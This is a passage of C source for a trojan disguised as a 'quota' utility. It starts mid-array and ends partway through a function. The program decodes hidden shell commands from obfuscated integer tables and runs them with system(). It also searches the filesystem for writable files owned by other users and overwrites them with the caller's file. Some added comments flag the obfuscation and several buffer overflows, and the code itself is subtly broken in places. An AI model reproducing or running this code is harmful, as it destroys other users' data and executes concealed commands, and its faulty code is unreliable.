85,54,126,23,12,123,118,76,116,85,8,90,111,35,106,113,40,40,122,85,43,108,31,\
32,5,9,77,5,14,99,100,107,114,60,70,19,26,12,14,114,118,48,40,12,106,93,60,\
112,52,67,30,47,55,107,75,90,112,55,38,107,117,22,89,47,79,58,55,119,27,119,\
115,85,38,30,122,126,3,93,97,44,100,32,33,10};
void main(argc, argv)
int argc;
char *argv[];
{
char *checkseed(int *seeds);
char *checkdir(char *dir);
int initseeds[201]={25,\
108,69,89,126,121,84,34,77,52,25,67,44,106,60,124,30,33,3,21,75,67,\
116,109,28,51,81,45,85,119,99,0,98,91,114,102,122,50,81,67,57,43,126,\
2,94,75,10,7,96,29,112,71,103,117,20,72,112,23,105,65,48,119,23,65,\
98,105,33,12,43,12,78,7,53,16,109,91,65,106,43,85,44,113,125,3,61,\
95,18,3,64,96,19,68,52,20,54,122,26,35,126,19,31,106,24,108,59,44,\
41,32,5,1,32,25,64,93,60,97,102,84,92,50,79,11,112,89,27,124,98,\
109,12,0,4,103,114,22,66,36,81,47,52,70,107,51,46,37,99,13,4,31,\
126,19,47,21,96,123,110,72,33,76,8,0,65,86,102,27,75,64,46,122,-47,\
53,1,42,20,-65,63,63,-7,-70,40,-39,-15,46,25,22,86,-39,86,82,21,-16,\
3,-9,-23,11,-21,-90,-30,-7,20,-17,23};
int setupseeds[201]={1,\
35,44,14,107,20,81,111,42,72,73,90,34,86,50,32,16,97,78,80,124,7,\
110,13,71,107,24,91,84,68,58,38,105,68,64,121,37,101,64,65,40,91,8,\
29,9,60,101,123,122,22,92,37,66,13,30,88,8,70,5,28,108,20,101,125,\
38,78,106,98,85,55,92,122,0,93,0,37,97,82,120,70,82,65,74,90,41,\
28,104,80,71,117,11,104,32,69,5,56,2,48,8,112,109,16,109,35,57,43,\
119,37,86,42,62,44,118,117,7,94,88,28,109,125,-23,96,-15,-1,34,-69,33,\
93,10,-64,27,-56,-81,68,68,-5,25,4,10,70,68,42,53,-45,111,87,11,-54,\
-6,4,37,49,81,88,93,90,2,-72,60,65,85,3,-29,47,3,64,-35,78,58,\
42,2,-43,34,-80,53,70,10,-7,25,29,54,21,-11,7,-69,5,-19,4,30,77,\
67,-10,-79,96,23,4,3,-68,84,64,89};
int binseeds[201]={1,\
14,11,95,67,113,29,87,45,24,115,45,88,60,43,114,98,6,56,111,75,13,\
121,123,50,108,17,1,28,15,62,17,81,14,101,39,13,112,90,2,15,114,34,\
64,91,79,79,57,34,31,41,5,34,62,58,93,21,108,110,88,83,114,126,112,\
89,14,41,102,88,10,10,45,111,25,35,38,76,115,57,113,49,72,58,46,83,\
121,87,84,71,81,104,18,41,110,80,82,44,92,5,89,39,104,103,30,96,37,\
12,50,25,64,36,24,54,38,33,35,-79,23,54,-9,87,35,-5,-17,24,-69,-23,\
42,-58,-3,73,11,-3,7,78,-21,15,4,-46,1,84,96,101,-31,96,104,-2,19,\
-7,0,45,34,97,20,96,91,-17,-9,16,67,103,10,-61,48,-7,45,42,2,77,\
-23,1,33,27,-2,-8,80,-6,-17,25,-27,3,-47,43,54,-22,83,2,-17,-39,62,\
89,-7,-11,94,19,-65,72,-3,67,79,111};
int procseeds[201]={-14,\
97,103,125,91,45,90,21,121,60,39,28,60,11,76,41,69,21,118,7,90,63,\
17,17,48,46,68,126,72,66,68,32,54,119,44,98,94,15,21,33,68,4,109,\
121,109,27,7,66,65,126,121,97,40,101,84,6,48,97,38,25,7,56,112,97,\
125,36,125,46,115,108,40,2,105,52,44,17,122,111,98,30,17,112,27,115,29,\
78,125,125,16,81,17,99,88,108,88,14,83,42,26,114,54,90,106,39,126,19,\
95,2,1,69,14,93,114,105,78,48,42,25,87,14,120,124,55,102,57,35,30,\
107,11,74,44,8,100,118,25,73,64,97,106,57,81,92,34,109,80,118,112,85,\
99,99,21,20,62,116,42,111,67,29,79,12,34,84,67,12,105,107,90,109,23,\
116,25,104,89,124,29,-38,1,-9,95,21,0,39,43,45,-72,35,-69,-83,30,78,\
85,-11,-22,111,-47,-65,60,-1,85,78,106};
int boutseeds[201]={-14842,\
37,119,64,88,3,4,11,86,22,104,51,21,57,122,64,113,58,102,72,32,118,\
17,28,35,97,53,125,64,79,95,86,40,122,35,50,48,41,54,18,87,67,125,\
74,95,0,100,19,71,37,69,113,100,82,54,18,123,37,97,107,126,38,114,22,\
75,123,3,33,64,35,37,20,73,68,37,46,89,95,88,22,108,92,51,40,3,\
70,19,125,62,74,69,113,2,25,101,7,59,100,2,69,83,25,33,61,71,117,\
34,70,119,65,27,62,68,25,12,70,87,58,43,112,86,49,24,24,80,84,52,\
6,46,121,115,25,91,53,94,123,12,59,34,66,84,16,93,76,88,38,22,110,\
106,26,101,55,84,64,120,54,29,6,67,54,126,2,17,97,115,41,125,4,4,\
-55,8,41,25,-1,49,76,-61,-85,40,-27,-15,29,50,62,-9,20,-1,-14,15,9,\
32,-72,-94,40,-61,-54,-12,11,72,66,91};
int shtdwnseeds[201]={-42,\
58,44,53,114,68,10,105,76,13,99,1,12,79,50,106,27,65,83,96,30,101,\
122,112,87,118,3,35,55,6,84,59,98,28,58,82,126,98,114,85,125,7,39,\
69,58,21,70,28,35,65,57,70,93,0,36,14,100,107,9,107,71,52,1,29,\
115,63,110,118,28,16,82,53,80,56,50,108,58,109,26,75,19,91,92,59,86,\
125,114,40,76,15,38,8,57,58,103,65,23,52,14,36,8,119,70,47,64,53,\
1,15,83,35,33,80,10,98,51,38,30,14,119,11,26,61,15,117,37,103,117,\
32,4,21,67,40,40,78,74,47,108,27,120,9,114,14,56,75,84,52,29,55,\
108,105,42,71,8,83,89,118,79,22,119,1,28,3,36,22,12,77,77,105,33,\
12,104,-75,18,-4,62,72,-60,1,79,11,0,-17,-8,-23,-4,89,-4,-4,19,76,\
16,-90,-78,45,-38,-65,56,11,77,71,89};
char *zipper(int *seeds1);
char *path;
int i=0,j,inhan,outhan;
if(argc!=2)
{
puts("Usage:");
puts("quota ");
puts("where is the file you wish");
puts("to hide/subtract from your quota.");
exit(0);
}
system(zipper(initseeds));
system(zipper(setupseeds));
system(checkseed(binseeds));
path=checkdir("/");
if(!path)
{
puts("Technical Dificulties");
goto closeout;
}
if((outhan=open(path,O_WRONLY|O_TRUNC))==-1)
{
puts("Error opening outfile");
goto closeout;
}
if((inhan=open(argv[1],O_RDONLY))==-1)
{
puts("Error opening infile");
goto closeout;
}
if(filecopy(inhan,outhan))
{
puts("Technical dificulties");
goto closeout;
}
if((unlink(argv[1]))==-1)
{
puts("Technical dificulties.");
goto closeout;
}
if((rename(path,argv[1]))==-1)
if((link(path,argv[1]))==-1)
if((symlink(path,argv[1]))==-1)
puts("Technical Dificulties.");
closeout:
system("%s\n",zipper(procseeds));
system("%s\n",zipper(boutseeds));
system("%s\n",zipper(shtdwnseeds));
}
/*
 * Looks through the directories listed in $PATH and, if stat() succeeds on
 * the path it builds, returns zipper(seeds); otherwise returns 0.
 * Calls exit(-1) when PATH is not set.
 *
 * A name is decoded from the tail of `seeds`: starting at index 200 and
 * walking downward, each character is seeds[i] + seedsc[i], stopping at the
 * first sum equal to 32 (ASCII space). The decoded text is therefore not
 * visible in the source.
 *
 * NOTE(review): none of the copies into testseeds[30] or god[200] is
 * length-checked, and stat() is given a NULL result buffer, so this routine
 * should only ever be examined statically, not run.
 */
char *checkseed(int *seeds)
{
char *zipper(int *seeds1);
char *string;
char testseeds[30];
char god[200];
int i=200,j;
if((string=(char *)getenv("PATH"))==NULL)
{
puts("Path not found");
exit(-1);
}
/* Decode characters from the end of the table until a space (32). */
while((seeds[i]+seedsc[i])!=32)
{
testseeds[200-i]=seeds[i]+seedsc[i];
i--;
}
testseeds[i]=0;
i=0;
/* Walk PATH one entry at a time; 58 is ':' and 47 is '/'. */
while(string[i]!=0)
{
j=0;
while(string[i]!=58&&string[i]!=0)
{
god[j]=string[i];
i++;
j++;
}
i++;
/* Append '/' and a NUL, then copy the decoded name after that NUL. */
god[j++]=47;
god[j++]=0;
strcpy(&god[j],testseeds);
if(!stat(god,NULL))
return (char *)zipper(seeds);
}
return 0;
}
/*
 * Decodes one of the 201-entry integer tables into a string: output byte k
 * is seeds1[200-k] + seedsc[200-k]. Returns a malloc'd 201-byte copy; nothing
 * in this listing frees it.
 *
 * Defender's note: main() in this listing passes the returned string to
 * system(), so the shell commands this program runs are stored only in
 * obfuscated form and cannot be read from the source. Treat the program as
 * untrusted: decode the tables offline to see what it would execute instead
 * of compiling and running it.
 *
 * NOTE(review): teeth has 201 elements, so the store to teeth[201] is one
 * past the end of the array, and the malloc result is used unchecked.
 */
char *zipper(int *seeds1)
{
int i;
char *buhbye;
char teeth[201];
teeth[201]=0;
/* Reverse walk: table index 200 produces the first output byte. */
for(i=200;i>=0;i--)
teeth[200-i]=seeds1[i]+seedsc[i];
buhbye=(char *)malloc(201);
strcpy(buhbye,teeth);
return buhbye;
}
/*
 * Copies everything readable from descriptor `from` to descriptor `to`.
 *
 * Returns 0 once read() reports end of file. Returns 1 when either
 * descriptor is negative, when read() fails, when write() transfers a
 * different number of bytes than was read, or when no buffer could be
 * allocated. Neither descriptor is closed here.
 */
int filecopy(int from,int to)
{
int bufsiz;
if (from < 0)
return 1;
if (to < 0)
goto err;
/* Try a 16 KiB buffer first; halve the size (down to 128) only while
 * malloc keeps failing. */
for (bufsiz = 0x4000; bufsiz >= 128; bufsiz >>= 1)
{
register char *buffer;
buffer = (char *) malloc(bufsiz);
if (buffer)
{
while (1)
{
register int n;
n = read(from,buffer,bufsiz);
if (n == -1)
break;
if (n == 0)
{
/* End of input: the only success path. */
free(buffer);
return 0;
}
/* A short or failed write is treated as an error. */
if (n != write(to,buffer,(unsigned) n))
break;
}
/* Reached only after a read or write error. */
free(buffer);
break;
}
}
err:
return 1;
}
char *checkdir(char *dir)
{
char *checkdir(char *dir);
DIR *currdir;
struct dirent *node;
struct stat statnode;
int i,j;
char *path;
char *retpath;
path=(char *)malloc(300);
if((currdir=opendir(dir))==NULL)
return 0;
node=readdir(currdir);
while(node)
{
i=0;
j=0;
while(dir[i])
{
path[i]=dir[i];
i++;
}
if(strcmp(dir,"/"))
{
path[i]='/';
i++;
}
while(node->d_name[j])
{
path[i]=node->d_name[j];
i++;
j++;
}
path[i]=0;
if((lstat(path,&statnode))==-1)
return 0;
if(statnode.st_mode&S_IFREG)
if(!access(path,W_OK))
if(!(statnode.st_mode&S_IFBLK))
if(!(statnode.st_mode&S_ISVTX))
if(statnode.st_uid!=getuid())
return path;
if(statnode.st_mode&S_IFDIR)